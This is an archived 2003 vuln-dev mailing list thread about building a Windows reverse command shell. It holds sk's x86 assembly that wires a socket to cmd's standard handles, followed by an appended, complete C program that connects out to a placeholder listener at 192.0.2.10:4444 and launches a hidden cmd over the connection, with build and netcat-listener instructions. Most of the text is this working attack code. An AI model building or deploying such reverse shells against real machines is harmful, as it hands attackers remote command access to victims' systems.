Vulnerability Development mailing list archives
Re: Windows reverse Shell
From: "sk" <sk () scan-associates net>
Date: Wed, 5 Feb 2003 00:42:54 +0800
If I remember correctly, that shellcode doesn't have a "bind" function. A reverse-connect shellcode doesn't need "bind". WSASocket() will return a non-overlapping socket, so it can be used as the in/out/err handler in CreateProcess(); there is really nothing extra you need to do. Since you got a connection in your nc, the problem should be in your CreateProcess(). Try to check whether your StartupInfo flags have STARTF_USESTDHANDLES.

I don't have C code for this, but in asm, it could be something like this:

    ; ebx = socket
    ; ebp -> scratch buffer: STARTUPINFO (44h bytes) followed by PROCESS_INFORMATION
    ; esi -> "cmd",0
    ; [edi-28] = address of CreateProcess
    ; eax must be 0 at this point, since rep stosd stores eax
    xor     ecx,ecx
    mov     cl,11h                          ; 11h dwords = 44h bytes
    push    edi
    mov     edi,ebp
    rep stos dword ptr [edi]                ; zero up startupinfo
    pop     edi
    mov     byte ptr [ebp],44h              ; STARTUPINFO size (cb)
    mov     dword ptr [ebp+3Ch],ebx         ; output handler (hStdOutput)
    mov     dword ptr [ebp+38h],ebx         ; input handler (hStdInput)
    mov     dword ptr [ebp+40h],ebx         ; error handler (hStdError)
    mov     word ptr [ebp+2Ch],0101h        ; dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW
                                            ; wShowWindow stays 0 = SW_HIDE
    lea     eax,[ebp+44h]                   ; PROCESS_INFORMATION right after STARTUPINFO
    push    eax                             ; lpProcessInformation
    push    ebp                             ; lpStartupInfo
    push    ecx                             ; lpCurrentDirectory = NULL (ecx is 0 after rep stos)
    push    ecx                             ; lpEnvironment = NULL
    push    ecx                             ; dwCreationFlags = 0
    inc     ecx
    push    ecx                             ; bInheritHandles = TRUE
    dec     ecx
    push    ecx                             ; lpThreadAttributes = NULL
    push    ecx                             ; lpProcessAttributes = NULL
    push    esi                             ; lpCommandLine = "cmd",0
    push    ecx                             ; lpApplicationName = NULL
    call    dword ptr [edi-28]              ; CreateProcess

sk

----- Original Message -----
From: "NetNinja" <netninja () hotmail kg>
To: <vuln-dev () securityfocus com>
Sent: Tuesday, February 04, 2003 3:37 AM
Subject: Windows reverse Shell
Hello guys,

David Litchfield, in his Blackhat talk, talked about using the socket handle from WSASocket() and passing that handle as a parameter to stdin, stdout and stderr for the CreateProcess function. By doing it this way his reverse cmd shellcode becomes much smaller. I tried coding that reverse command shell in C, but couldn't get it to work. It simply connects to my listening netcat listener and then disconnects. David Litchfield used 4 functions to achieve that: WSASocket, bind, connect and CreateProcess. A little help would be appreciated on building this reverse cmd shell. Thanks.

--
Best regards,
Adik
mailto:netninja () hotmail kg
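What sk describes, written out in C as an added example (this is not code from the thread, from sk, or from David Litchfield's talk). The portable part reproduces the 44h-byte STARTUPINFO image the asm builds and implements the check sk suggests: it returns the handle cmd will inherit as stdin/stdout/stderr, or 0 when STARTF_USESTDHANDLES is missing or the three handles do not all name the socket. The part under _WIN32 is the WSASocket/connect/CreateProcess reverse shell NetNinja asked about. The field offsets are the documented 32-bit STARTUPINFO layout, and the listener address 192.0.2.10:4444 is a placeholder; both are assumptions of the example.

```c
/* Added example, not code from the thread. Portable part: rebuild the
 * STARTUPINFO image sk's shellcode writes and check it the way sk suggests.
 * _WIN32 part: the WSASocket/connect/CreateProcess reverse shell in C.
 * Offsets assume the documented 32-bit Win32 STARTUPINFO layout. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SI32_SIZE        0x44   /* sizeof(STARTUPINFO), 32-bit           */
#define SI32_DWFLAGS     0x2C   /* DWORD dwFlags                          */
#define SI32_HSTDINPUT   0x38
#define SI32_HSTDOUTPUT  0x3C
#define SI32_HSTDERROR   0x40
#define SF_USESHOWWINDOW 0x001  /* STARTF_USESHOWWINDOW                   */
#define SF_USESTDHANDLES 0x100  /* STARTF_USESTDHANDLES                   */

/* Explicit little-endian access so the image matches x86 on any host. */
static void put32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}
static uint32_t get32(const uint8_t *p)
{
    return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Same writes as the asm: zero 44h bytes, cb = 44h, three std handles = the
 * socket, dwFlags = 0101h. wShowWindow stays 0 (SW_HIDE). */
void build_startupinfo32(uint8_t si[SI32_SIZE], uint32_t sock)
{
    memset(si, 0, SI32_SIZE);                 /* rep stosd with eax = 0    */
    si[0] = SI32_SIZE;                        /* mov byte ptr [ebp],44h    */
    put32(si + SI32_HSTDOUTPUT, sock);        /* [ebp+3Ch]                 */
    put32(si + SI32_HSTDINPUT, sock);         /* [ebp+38h]                 */
    put32(si + SI32_HSTDERROR, sock);         /* [ebp+40h]                 */
    si[SI32_DWFLAGS] = SF_USESHOWWINDOW;      /* word ptr [ebp+2Ch],0101h  */
    si[SI32_DWFLAGS + 1] = SF_USESTDHANDLES >> 8;
}

/* sk's diagnostic. Returns the handle the child gets as stdin/stdout/stderr,
 * or 0 if cb is wrong, STARTF_USESTDHANDLES is clear, or the three handles
 * are not the same non-zero object. Without the flag CreateProcess ignores
 * hStd*, cmd has no I/O on the socket, and nc sees a connect followed by EOF. */
uint32_t startupinfo32_redirected_to(const uint8_t si[SI32_SIZE])
{
    uint32_t flags = get32(si + SI32_DWFLAGS);
    uint32_t in = get32(si + SI32_HSTDINPUT);
    if (si[0] != SI32_SIZE || !(flags & SF_USESTDHANDLES) || in == 0) return 0;
    if (get32(si + SI32_HSTDOUTPUT) != in || get32(si + SI32_HSTDERROR) != in) return 0;
    return in;
}

#ifdef _WIN32
#include <winsock2.h>   /* must precede windows.h; link with ws2_32 */
#include <windows.h>
int reverse_shell(const char *host, unsigned short port)
{
    WSADATA wsa;
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) return -1;
    /* dwFlags = 0 gives a non-overlapped socket that works as a std handle;
     * socket() returns an overlapped one, which cmd's synchronous I/O cannot use. */
    SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (s == INVALID_SOCKET) return -1;
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = inet_addr(host);     /* dotted quad only; no bind() needed */
    if (connect(s, (struct sockaddr *)&sa, sizeof sa) == SOCKET_ERROR) return -1;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    memset(&si, 0, sizeof si);
    si.cb = sizeof si;
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;   /* the check sk asks for */
    si.wShowWindow = SW_HIDE;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)s;
    char cmd[] = "cmd";                        /* lpCommandLine must be writable */
    /* bInheritHandles = TRUE, otherwise the child never receives the socket. */
    if (!CreateProcessA(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) return -1;
    WaitForSingleObject(pi.hProcess, INFINITE);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    closesocket(s);
    WSACleanup();
    return 0;
}
#endif

int main(void)
{
#ifdef _WIN32
    return reverse_shell("192.0.2.10", 4444);  /* placeholder listener address */
#else
    uint8_t si[SI32_SIZE];
    build_startupinfo32(si, 0x1234);
    printf("std handles redirected to 0x%x\n", startupinfo32_redirected_to(si));
    return 0;
#endif
}
```

On Windows, build with ws2_32 linked and point the placeholder address at an `nc -l -p 4444` listener; on any other platform the file compiles and only exercises the layout helper. The example calls no bind(), which is sk's point about connect-back shells, and the redirected_to check is exactly the thing to run against a STARTUPINFO when the symptom is "connects, then disconnects".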
Current thread:
- Windows reverse Shell NetNinja (Feb 03)
- Re: Windows reverse Shell 3APA3A (Feb 05)
- Re[2]: Windows reverse Shell Adik (Feb 05)
- Re[2]: Windows reverse Shell 3APA3A (Feb 05)
- Re: Windows reverse Shell sk (Feb 05)
- <Possible follow-ups>
- Re: Windows reverse Shell Ali Saifullah Khan (Feb 05)
- Re: Windows reverse Shell Berend-Jan Wever (Feb 05)
- Re: Windows reverse Shell 3APA3A (Feb 05)